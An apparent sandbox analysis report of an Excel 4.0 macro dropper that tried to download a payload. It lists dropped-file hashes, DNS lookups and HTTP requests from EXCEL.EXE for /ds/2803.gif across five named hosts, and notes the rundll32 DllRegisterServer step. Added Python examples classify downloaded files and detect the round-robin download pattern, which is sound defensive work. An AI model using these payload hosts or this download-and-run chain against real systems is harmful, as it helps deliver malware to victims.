                Preview: L..................F.... ....mC..{....T..+..gc^..+..............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....x.2.....R. .DOCUME~1.XLS..\.......Q.y.Q.y*...8.....................d.o.c.u.m.e.n.t.-.9.3.3.3.4.0.7.8.2...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\830021\Users.user\Desktop\document-933340782.xlsm.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.-.9.3.3.3.4.0.7.8.2...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......830021..........D_....3N.
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):109
                Entropy (8bit):4.750124550037971
                Encrypted:false
                SSDEEP:3:oyBVomxWKS9LRzSShBCZELRzSShBCmxWKS9LRzSShBCv:dj49LdhhmELdhh89Ldhh2
                MD5:3964574BC9DD3C18B48C07D1334EDABC
                SHA1:F3A4E8168156D52D261727B6D09867A7488C6E2B
                SHA-256:A8B88213A4FC40A7ECC677D7EAA84C51DDD0BC729002ADDF34DE36230409D12B
                SHA-512:FC07F8BA89E7D859D109C71A9F07CD8C52AA6DFB4FEF77D76ECAD4AF12DE77B97C49ED28F6779DE5AEE32B9D580D2064DBD888C5626A75EC672078DDE976E376
                Malicious:false
                Preview: Desktop.LNK=0..[misc]..document-933340782.LNK=0..document-933340782.LNK=0..[misc]..document-933340782.LNK=0..
                C:\Users\user\Desktop\82DE0000
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):108482
                Entropy (8bit):7.912405123821417
                Encrypted:false
                SSDEEP:3072:GJrWNPTGqT+dY71DzPjEwqtDxNko+bJ99K7meX7pr2:GGPTGa08NjYDp+d9imeX7pr2
                MD5:75D5EBE3BB27E63BB7B1B3BFAD5466B0
                SHA1:17E6B14CCF5F5F650F3C1241DFFD4C1E53E5EE3A
                SHA-256:E2B376D8A9093A89C3427258C2A52BF5B35030144F74295A4B130F17E9C9B464
                SHA-512:27AA12625B373CA99F02D080681BD4B51A6AB1C5DCC8B6E15CAF5D87DBDC1A418472DA0B3B5BC16133B8A5611AA20D84154DC8141D615AB2054A7087B4C2CF0A
                Malicious:false
                Preview: .U.N.0..#.?D....#4j.b........mb./..h..k7.......>......."j.Zv.LX.Nz.]..wW.9.0.....Z..d...'.u....e}J.7.({........G+.....B.E..l2..w.\.S.`.._X.{....].8.k.?...T.D.FK..(.pjG.........D.`. ....&DM...R.`..^...Mm..|}?"........%..:.O*.B^9...G.....F.t-,..W.?...{.l...2-..`..Xc......Z..=;<.T.....;$.>$../').#>.....y..m..za.....b.}S.D..x..|.f$8.......1.^DP...t...^s..PQ<f.|......c.4.n..H.4.....=.]."..4l....U...q....y.+P{.yy.........PK..........!...`.............[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\Desktop\~$document-933340782.xlsm
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):330
                Entropy (8bit):1.4377382811115937
                Encrypted:false
                SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                MD5:96114D75E30EBD26B572C1FC83D1D02E
                SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                Malicious:true
                Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                C:\Users\user\iekdhfe.dsk
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:HTML document, ASCII text, with very long lines
                Category:dropped
                Size (bytes):7295
                Entropy (8bit):5.637267147483986
                Encrypted:false
                SSDEEP:192:ElVZHCkA26xd3Qk/uTtMy47R/Ga0kVhFuPwf8Pn9wHHyJS:EJ8VGaRF8I8K
                MD5:AFC83AE7C4EA82B533D9B8731AAB3E80
                SHA1:A77EB9C6E5472FE4A17385ACB32BF96C9F69A65F
                SHA-256:FDF900267092BC67BD7786B86C462E69F9ED52BED838809B6BA28B298BE879F6
                SHA-512:5CF249AFF46D7B7C1BE5F2F2CA3D771E6EEB9B85EF8D6CE8BB93DFEEB0957F9E8BF15FC4B57D98A19F76E49C51A68C957EDC6CB98CCC15AE3215BC326D968CF7
                Malicious:false
                Preview: <!DOCTYPE html>.<html>. <head>. <meta http-equiv="Content-type" content="text/html; charset=utf-8">. <meta http-equiv="Cache-control" content="no-cache">. <meta http-equiv="Pragma" content="no-cache">. <meta http-equiv="Expires" content="0">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <title>Account Suspended</title>. <link rel="stylesheet" href="//use.fontawesome.com/releases/v5.0.6/css/all.css">. <style type="text/css">. body {. font-family: Arial, Helvetica, sans-serif;. font-size: 14px;. line-height: 1.428571429;. background-color: #ffffff;. color: #2F3230;. padding: 0;. margin: 0;. }. section {. display: block;. padding: 0;. margin: 0;. }. .container {. margin-left: auto;. margin-right: auto;. padding: 0 10px;. }. .additional-info {.
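The dropped file above is what the macro downloaded into ..\iekdhfe.dsk and then handed to rundll32 with DllRegisterServer (see the process tree): not a DLL but the hosting provider's "Account Suspended" HTML page, so rundll32 had nothing it could load. The following added example, which is not code from the sandbox report or from the sample, makes that check explicit before any dynamic step: it classifies a downloaded blob by magic bytes and, for an MZ/PE file, reads IMAGE_FILE_HEADER.Characteristics (the real Windows layout: e_lfanew at offset 0x3C, "PE\0\0", then the 20-byte file header) to see whether IMAGE_FILE_DLL (0x2000) is set. The HTML stub and the header-only PE blobs are constructed inputs, not the real dropped file.

```python
"""Triage of a file that an Excel 4.0 macro downloaded and then passed to
rundll32 (here ..\\iekdhfe.dsk, run with DllRegisterServer).

Added example, not code from the sandbox report or from the sample.
Question answered: is the artifact something rundll32 could load at all
(a PE image with the DLL flag set), or did the download server hand back
something else (an HTML error page, a ZIP, junk)?
"""
import struct

IMAGE_FILE_DLL = 0x2000   # IMAGE_FILE_HEADER.Characteristics bit
PE_SIGNATURE = b"PE\0\0"


def classify(data: bytes) -> dict:
    """Classify a downloaded blob and say whether rundll32 could load it."""
    head = data[:64].lstrip(b" \t\r\n").lower()
    if head.startswith((b"<!doctype html", b"<html")):
        return {"kind": "html", "loadable_by_rundll32": False,
                "reason": "HTML document (e.g. a hosting provider's 'Account Suspended' stub), not a PE"}
    if data[:2] == b"PK":
        return {"kind": "zip", "loadable_by_rundll32": False,
                "reason": "ZIP container (Office Open XML, JAR, ...)"}
    if data[:2] != b"MZ":
        return {"kind": "unknown", "loadable_by_rundll32": False,
                "reason": "no MZ signature"}
    if len(data) < 0x40:
        return {"kind": "truncated", "loadable_by_rundll32": False,
                "reason": "shorter than a DOS header"}
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    # The 20-byte IMAGE_FILE_HEADER follows the 4-byte PE signature.
    if e_lfanew + 4 + 20 > len(data) or data[e_lfanew:e_lfanew + 4] != PE_SIGNATURE:
        return {"kind": "mz-stub", "loadable_by_rundll32": False,
                "reason": "MZ header but no PE signature at e_lfanew"}
    machine, _nsec, _ts, _symp, _nsym, _optsz, characteristics = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4)
    is_dll = bool(characteristics & IMAGE_FILE_DLL)
    return {"kind": "pe-dll" if is_dll else "pe-exe",
            "loadable_by_rundll32": is_dll,
            "machine": hex(machine),
            "reason": "PE image, IMAGE_FILE_DLL %s" % ("set" if is_dll else "clear")}


# Constructed inputs (not the real dropped file): an HTML stub shaped like the
# 'Account Suspended' page, and a minimal MZ+PE header with or without the DLL
# flag.  The PE blobs are header-only and cannot actually run.
HTML_STUB = b"<!DOCTYPE html>\n<html>\n <head>\n <title>Account Suspended</title>\n"


def make_min_pe(is_dll: bool, machine: int = 0x14C) -> bytes:
    """Build a header-only PE: DOS header, PE signature, IMAGE_FILE_HEADER."""
    e_lfanew = 0x40
    dos_header = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # EXECUTABLE_IMAGE (0x0002) | 32BIT_MACHINE (0x0100) [| DLL (0x2000)]
    characteristics = 0x0102 | (IMAGE_FILE_DLL if is_dll else 0)
    file_header = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, 0, characteristics)
    return dos_header + PE_SIGNATURE + file_header


if __name__ == "__main__":
    for name, blob in [("iekdhfe.dsk-like html", HTML_STUB),
                       ("dll", make_min_pe(True)),
                       ("exe, not dll", make_min_pe(False))]:
        print(name, "->", classify(blob))
```

The DLL-flag check is deliberately shallow: a file can carry IMAGE_FILE_DLL and still fail to load (missing export, wrong bitness for the rundll32 that runs it, corrupt sections), so a "pe-dll" verdict means "worth detonating", not "will run".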

                Static File Info

                General

                File type:Microsoft Excel 2007+
                Entropy (8bit):7.912414325558474
                TrID:
                • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                • ZIP compressed archive (8000/1) 16.67%
                File name:document-933340782.xlsm
                File size:108510
                MD5:766f5bb363db9a966b613a42a118798a
                SHA1:57e67742fd7e7fa0badddca5b2cceb4cf09048a7
                SHA256:9952ce93009bb9fe2b687053da8db61f551cd524ca2691669257c35aaba18832
                SHA512:3157b083902de46d1aaf75ac978537b479350c145a667c16965936f3ec9c84f08768604abbb4b54a12d37b8ce6b89136651b8083032887e730e6078b49cdaae9
                SSDEEP:3072:Q26TGqT+dY7EDzPjEwqtDlko+bJ99K7meX7pD3:QLTGa084jYDv+d9imeX7pD3
                File Content Preview:PK..........!...`.............[Content_Types].xml ...(..............................................................................................................................................................................................##.........

                File Icon

                Icon Hash:e4e2aa8aa4bcbcac

                Static OLE Info

                General

                Document Type:OpenXML
                Number of OLE Files:1

                OLE File "document-933340782.xlsm"

                Indicators

                Has Summary Info:
                Application Name:
                Encrypted Document:
                Contains Word Document Stream:
                Contains Workbook/Book Stream:
                Contains PowerPoint Document Stream:
                Contains Visio Document Stream:
                Contains ObjectPool Stream:
                Flash Objects Count:
                Contains VBA Macros:

                Macro 4.0 Code

(The exported macro sheet renders as empty cells only: the dump consists of cell separators with no formula text, so no Excel 4.0 formulas are reproduced here.)

                Network Behavior

                Network Port Distribution

                TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 7, 2021 10:46:54.075469971 CEST | 49167 | 80 | 192.168.2.22 | 50.23.112.133
Apr 7, 2021 10:46:54.248955965 CEST | 80 | 49167 | 50.23.112.133 | 192.168.2.22
Apr 7, 2021 10:46:54.249090910 CEST | 49167 | 80 | 192.168.2.22 | 50.23.112.133
Apr 7, 2021 10:46:54.249636889 CEST | 49167 | 80 | 192.168.2.22 | 50.23.112.133
Apr 7, 2021 10:46:54.423564911 CEST | 80 | 49167 | 50.23.112.133 | 192.168.2.22
Apr 7, 2021 10:46:54.427109003 CEST | 80 | 49167 | 50.23.112.133 | 192.168.2.22
Apr 7, 2021 10:46:54.427304029 CEST | 49167 | 80 | 192.168.2.22 | 50.23.112.133
Apr 7, 2021 10:46:54.430351973 CEST | 49167 | 80 | 192.168.2.22 | 50.23.112.133
Apr 7, 2021 10:46:54.877640009 CEST | 49167 | 80 | 192.168.2.22 | 50.23.112.133
Apr 7, 2021 10:46:55.087573051 CEST | 80 | 49167 | 50.23.112.133 | 192.168.2.22
Apr 7, 2021 10:46:55.087595940 CEST | 80 | 49167 | 50.23.112.133 | 192.168.2.22
Apr 7, 2021 10:46:55.087610960 CEST | 80 | 49167 | 50.23.112.133 | 192.168.2.22
Apr 7, 2021 10:46:55.087620974 CEST | 80 | 49167 | 50.23.112.133 | 192.168.2.22
Apr 7, 2021 10:46:55.087632895 CEST | 80 | 49167 | 50.23.112.133 | 192.168.2.22
Apr 7, 2021 10:46:55.087821007 CEST | 49167 | 80 | 192.168.2.22 | 50.23.112.133
Apr 7, 2021 10:46:55.274617910 CEST | 49168 | 80 | 192.168.2.22 | 31.170.166.139
Apr 7, 2021 10:46:55.393896103 CEST | 80 | 49168 | 31.170.166.139 | 192.168.2.22
Apr 7, 2021 10:46:55.395517111 CEST | 49168 | 80 | 192.168.2.22 | 31.170.166.139
Apr 7, 2021 10:46:55.395570040 CEST | 49168 | 80 | 192.168.2.22 | 31.170.166.139
Apr 7, 2021 10:46:55.515464067 CEST | 80 | 49168 | 31.170.166.139 | 192.168.2.22
Apr 7, 2021 10:46:55.620822906 CEST | 80 | 49168 | 31.170.166.139 | 192.168.2.22
Apr 7, 2021 10:46:55.620996952 CEST | 49168 | 80 | 192.168.2.22 | 31.170.166.139
Apr 7, 2021 10:46:55.794830084 CEST | 49169 | 80 | 192.168.2.22 | 143.95.33.96
Apr 7, 2021 10:46:55.941339016 CEST | 80 | 49169 | 143.95.33.96 | 192.168.2.22
Apr 7, 2021 10:46:55.941493988 CEST | 49169 | 80 | 192.168.2.22 | 143.95.33.96
Apr 7, 2021 10:46:55.942820072 CEST | 49169 | 80 | 192.168.2.22 | 143.95.33.96
Apr 7, 2021 10:46:56.088896990 CEST | 80 | 49169 | 143.95.33.96 | 192.168.2.22
Apr 7, 2021 10:46:56.220531940 CEST | 80 | 49169 | 143.95.33.96 | 192.168.2.22
Apr 7, 2021 10:46:56.220602989 CEST | 49169 | 80 | 192.168.2.22 | 143.95.33.96
Apr 7, 2021 10:46:56.221170902 CEST | 49169 | 80 | 192.168.2.22 | 143.95.33.96
Apr 7, 2021 10:46:56.228161097 CEST | 80 | 49169 | 143.95.33.96 | 192.168.2.22
Apr 7, 2021 10:46:56.228245020 CEST | 49169 | 80 | 192.168.2.22 | 143.95.33.96
Apr 7, 2021 10:46:56.280091047 CEST | 49170 | 80 | 192.168.2.22 | 103.68.166.129
Apr 7, 2021 10:46:56.369083881 CEST | 80 | 49169 | 143.95.33.96 | 192.168.2.22
Apr 7, 2021 10:46:56.369193077 CEST | 49169 | 80 | 192.168.2.22 | 143.95.33.96
Apr 7, 2021 10:46:56.390928984 CEST | 80 | 49170 | 103.68.166.129 | 192.168.2.22
Apr 7, 2021 10:46:56.391096115 CEST | 49170 | 80 | 192.168.2.22 | 103.68.166.129
Apr 7, 2021 10:46:56.392405987 CEST | 49170 | 80 | 192.168.2.22 | 103.68.166.129
Apr 7, 2021 10:46:56.506817102 CEST | 80 | 49170 | 103.68.166.129 | 192.168.2.22
Apr 7, 2021 10:46:56.506926060 CEST | 49170 | 80 | 192.168.2.22 | 103.68.166.129
Apr 7, 2021 10:46:56.739958048 CEST | 49171 | 80 | 192.168.2.22 | 66.36.231.40
Apr 7, 2021 10:46:56.840977907 CEST | 80 | 49171 | 66.36.231.40 | 192.168.2.22
Apr 7, 2021 10:46:56.841373920 CEST | 49171 | 80 | 192.168.2.22 | 66.36.231.40
Apr 7, 2021 10:46:56.842498064 CEST | 49171 | 80 | 192.168.2.22 | 66.36.231.40
Apr 7, 2021 10:46:56.944106102 CEST | 80 | 49171 | 66.36.231.40 | 192.168.2.22
Apr 7, 2021 10:46:57.104089022 CEST | 80 | 49171 | 66.36.231.40 | 192.168.2.22
Apr 7, 2021 10:46:57.104269981 CEST | 49171 | 80 | 192.168.2.22 | 66.36.231.40
Apr 7, 2021 10:47:01.456758976 CEST | 80 | 49168 | 31.170.166.139 | 192.168.2.22
Apr 7, 2021 10:47:01.456913948 CEST | 49168 | 80 | 192.168.2.22 | 31.170.166.139
Apr 7, 2021 10:48:00.087519884 CEST | 80 | 49167 | 50.23.112.133 | 192.168.2.22
Apr 7, 2021 10:48:00.090121984 CEST | 49167 | 80 | 192.168.2.22 | 50.23.112.133
Apr 7, 2021 10:48:02.100714922 CEST | 80 | 49171 | 66.36.231.40 | 192.168.2.22
Apr 7, 2021 10:48:02.100928068 CEST | 49171 | 80 | 192.168.2.22 | 66.36.231.40
Apr 7, 2021 10:48:53.845046997 CEST | 49171 | 80 | 192.168.2.22 | 66.36.231.40
Apr 7, 2021 10:48:53.845238924 CEST | 49170 | 80 | 192.168.2.22 | 103.68.166.129
Apr 7, 2021 10:48:53.845417023 CEST | 49168 | 80 | 192.168.2.22 | 31.170.166.139
Apr 7, 2021 10:48:53.845612049 CEST | 49167 | 80 | 192.168.2.22 | 50.23.112.133
Apr 7, 2021 10:48:53.945624113 CEST | 80 | 49171 | 66.36.231.40 | 192.168.2.22
Apr 7, 2021 10:48:53.956664085 CEST | 80 | 49170 | 103.68.166.129 | 192.168.2.22
Apr 7, 2021 10:48:53.956782103 CEST | 49170 | 80 | 192.168.2.22 | 103.68.166.129
Apr 7, 2021 10:48:54.019201040 CEST | 80 | 49167 | 50.23.112.133 | 192.168.2.22
Apr 7, 2021 10:48:54.187586069 CEST | 49168 | 80 | 192.168.2.22 | 31.170.166.139
Apr 7, 2021 10:48:54.858479977 CEST | 49168 | 80 | 192.168.2.22 | 31.170.166.139
Apr 7, 2021 10:48:56.184684992 CEST | 49168 | 80 | 192.168.2.22 | 31.170.166.139
Apr 7, 2021 10:48:58.836857080 CEST | 49168 | 80 | 192.168.2.22 | 31.170.166.139

                UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 7, 2021 10:46:53.897473097 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8
Apr 7, 2021 10:46:54.057022095 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22
Apr 7, 2021 10:46:55.112276077 CEST | 53099 | 53 | 192.168.2.22 | 8.8.8.8
Apr 7, 2021 10:46:55.270534992 CEST | 53 | 53099 | 8.8.8.8 | 192.168.2.22
Apr 7, 2021 10:46:55.637224913 CEST | 52838 | 53 | 192.168.2.22 | 8.8.8.8
Apr 7, 2021 10:46:55.792998075 CEST | 53 | 52838 | 8.8.8.8 | 192.168.2.22
Apr 7, 2021 10:46:56.232707977 CEST | 61200 | 53 | 192.168.2.22 | 8.8.8.8
Apr 7, 2021 10:46:56.276132107 CEST | 53 | 61200 | 8.8.8.8 | 192.168.2.22
Apr 7, 2021 10:46:56.523128986 CEST | 49548 | 53 | 192.168.2.22 | 8.8.8.8
Apr 7, 2021 10:46:56.735892057 CEST | 53 | 49548 | 8.8.8.8 | 192.168.2.22

                DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Apr 7, 2021 10:46:53.897473097 CEST | 192.168.2.22 | 8.8.8.8 | 0xbf29 | Standard query (0) | kristen.sbddev.com | A (IP address) | IN (0x0001)
Apr 7, 2021 10:46:55.112276077 CEST | 192.168.2.22 | 8.8.8.8 | 0xfbeb | Standard query (0) | tienda.ventadigital.com.ar | A (IP address) | IN (0x0001)
Apr 7, 2021 10:46:55.637224913 CEST | 192.168.2.22 | 8.8.8.8 | 0xccae | Standard query (0) | thirdstringcalifornia.com | A (IP address) | IN (0x0001)
Apr 7, 2021 10:46:56.232707977 CEST | 192.168.2.22 | 8.8.8.8 | 0x887e | Standard query (0) | holmesservices.mobiledevsite.co | A (IP address) | IN (0x0001)
Apr 7, 2021 10:46:56.523128986 CEST | 192.168.2.22 | 8.8.8.8 | 0x315e | Standard query (0) | nellaimasthanbiryani.com | A (IP address) | IN (0x0001)

                DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Apr 7, 2021 10:46:54.057022095 CEST | 8.8.8.8 | 192.168.2.22 | 0xbf29 | No error (0) | kristen.sbddev.com | - | 50.23.112.133 | A (IP address) | IN (0x0001)
Apr 7, 2021 10:46:55.270534992 CEST | 8.8.8.8 | 192.168.2.22 | 0xfbeb | No error (0) | tienda.ventadigital.com.ar | - | 31.170.166.139 | A (IP address) | IN (0x0001)
Apr 7, 2021 10:46:55.792998075 CEST | 8.8.8.8 | 192.168.2.22 | 0xccae | No error (0) | thirdstringcalifornia.com | - | 143.95.33.96 | A (IP address) | IN (0x0001)
Apr 7, 2021 10:46:56.276132107 CEST | 8.8.8.8 | 192.168.2.22 | 0x887e | No error (0) | holmesservices.mobiledevsite.co | - | 103.68.166.129 | A (IP address) | IN (0x0001)
Apr 7, 2021 10:46:56.735892057 CEST | 8.8.8.8 | 192.168.2.22 | 0x315e | No error (0) | nellaimasthanbiryani.com | - | 66.36.231.40 | A (IP address) | IN (0x0001)

                HTTP Request Dependency Graph

                • kristen.sbddev.com
                • tienda.ventadigital.com.ar
                • thirdstringcalifornia.com
                • holmesservices.mobiledevsite.co
                • nellaimasthanbiryani.com
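Every HTTP session in this report comes from EXCEL.EXE, requests the same path /ds/2803.gif from each of the five hosts above within about three seconds using an Internet Explorer user agent (URLDownloadToFile), and receives a redirect, a 503 or an HTML body instead of an image. The following added example, which is not part of the sandbox report, is detection logic a SOC could run over proxy- or EDR-style HTTP records to catch exactly that shape. The records it runs on are constructed from the sessions on this page (process, host, URI, status and Content-Type as reported; the response from the last host is not in this excerpt, so that record carries status 0), plus one benign browser fetch as a control; the rule names and thresholds are this example's own choices.

```python
"""Detection for 'Office process round-robins a payload URL through a host
list' as seen in the HTTP sessions of this report.

Added example, not part of the sandbox report.  Records are constructed
from the report's sessions; the rule names and thresholds are arbitrary.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timezone

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe"}
IMAGE_EXT = (".gif", ".png", ".jpg", ".jpeg", ".bmp", ".ico")


@dataclass(frozen=True)
class HttpRecord:
    ts: str             # "YYYY-mm-dd HH:MM:SS.ffffff", sandbox local time
    process: str        # image path of the requesting process
    host: str
    uri: str
    status: int         # 0 when no response was captured
    content_type: str   # "" when absent


def _epoch(ts: str) -> float:
    return datetime.strptime(ts, "%Y-%m-%d %H:%M:%S.%f").replace(
        tzinfo=timezone.utc).timestamp()


def _is_office(process: str) -> bool:
    return process.replace("/", "\\").rsplit("\\", 1)[-1].lower() in OFFICE_IMAGES


def detect(records, window_s=10.0, min_hosts=3):
    """Return a list of alert dicts for the two patterns described above."""
    alerts = []
    office = [r for r in records if _is_office(r.process)]

    # Rule 1: Office asks for an "image" and gets a redirect, an error, or a
    # non-image body.  Droppers hide payloads behind image-looking paths; here
    # every server answered with HTML or 5xx instead of a GIF.
    for r in office:
        if r.uri.lower().endswith(IMAGE_EXT) and (
                r.status >= 300 or not r.content_type.lower().startswith("image/")):
            alerts.append({"rule": "office_image_fetch_mismatch", "host": r.host,
                           "uri": r.uri, "status": r.status,
                           "content_type": r.content_type})

    # Rule 2: the same path requested from >= min_hosts distinct hosts inside a
    # window_s-second sliding window by an Office process (fallback host list).
    by_uri = defaultdict(list)
    for r in office:
        by_uri[r.uri].append(r)
    for uri, rs in by_uri.items():
        rs.sort(key=lambda r: _epoch(r.ts))
        for i, first in enumerate(rs):
            t0 = _epoch(first.ts)
            in_window = [r for r in rs[i:] if _epoch(r.ts) - t0 <= window_s]
            hosts = sorted({r.host for r in in_window})
            if len(hosts) >= min_hosts:
                alerts.append({"rule": "office_round_robin_download", "uri": uri,
                               "hosts": hosts,
                               "span_s": round(_epoch(in_window[-1].ts) - t0, 3)})
                break
    return alerts


# Constructed from this report's sessions (timestamps, hosts, URIs, statuses
# and Content-Types as shown); the last payload host's reply is not in the
# excerpt, so status 0 / no Content-Type.  The iexplore record is a benign
# control that must not alert.
EXCEL = r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"
SAMPLE = [
    HttpRecord("2021-04-07 10:46:54.249636", EXCEL, "kristen.sbddev.com", "/ds/2803.gif", 302, "text/html"),
    HttpRecord("2021-04-07 10:46:54.430351", EXCEL, "kristen.sbddev.com", "/cgi-sys/suspendedpage.cgi", 200, "text/html"),
    HttpRecord("2021-04-07 10:46:55.395570", EXCEL, "tienda.ventadigital.com.ar", "/ds/2803.gif", 503, "text/html"),
    HttpRecord("2021-04-07 10:46:55.942820", EXCEL, "thirdstringcalifornia.com", "/ds/2803.gif", 503, "text/html"),
    HttpRecord("2021-04-07 10:46:56.392405", EXCEL, "holmesservices.mobiledevsite.co", "/ds/2803.gif", 503, "text/html"),
    HttpRecord("2021-04-07 10:46:56.842498", EXCEL, "nellaimasthanbiryani.com", "/ds/2803.gif", 0, ""),
    HttpRecord("2021-04-07 10:47:10.000000", r"C:\Program Files\Internet Explorer\iexplore.exe",
               "example.com", "/logo.gif", 200, "image/gif"),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE):
        print(alert)
```

Rule 1 fires once per bad fetch and is noisy on its own (Office legitimately pulls linked images); rule 2 is the higher-confidence signal, since a benign document does not ask five unrelated hosts for the same path in three seconds. The example also skips the /cgi-sys/suspendedpage.cgi follow-up on purpose: it is the redirect target, not a payload request.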

                HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49167 | 50.23.112.133 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | kBytes transferred | Direction | Data
Apr 7, 2021 10:46:54.249636889 CEST | 0 | OUT | GET /ds/2803.gif HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: kristen.sbddev.com
                Connection: Keep-Alive
Apr 7, 2021 10:46:54.427109003 CEST | 1 | IN | HTTP/1.1 302 Found
                Server: nginx/1.18.0
                Date: Wed, 07 Apr 2021 08:46:54 GMT
                Content-Type: text/html; charset=iso-8859-1
                Content-Length: 235
                Connection: keep-alive
                Location: http://kristen.sbddev.com/cgi-sys/suspendedpage.cgi
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6b 72 69 73 74 65 6e 2e 73 62 64 64 65 76 2e 63 6f 6d 2f 63 67 69 2d 73 79 73 2f 73 75 73 70 65 6e 64 65 64 70 61 67 65 2e 63 67 69 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://kristen.sbddev.com/cgi-sys/suspendedpage.cgi">here</a>.</p></body></html>
Apr 7, 2021 10:46:54.430351973 CEST | 1 | OUT | GET /cgi-sys/suspendedpage.cgi HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: kristen.sbddev.com
                Connection: Keep-Alive
Apr 7, 2021 10:46:54.877640009 CEST | 2 | OUT | GET /cgi-sys/suspendedpage.cgi HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: kristen.sbddev.com
                Connection: Keep-Alive
Apr 7, 2021 10:46:55.087573051 CEST | 3 | IN | HTTP/1.1 200 OK
                Server: nginx/1.18.0
                Date: Wed, 07 Apr 2021 08:46:55 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: keep-alive
                Content-Encoding: gzip
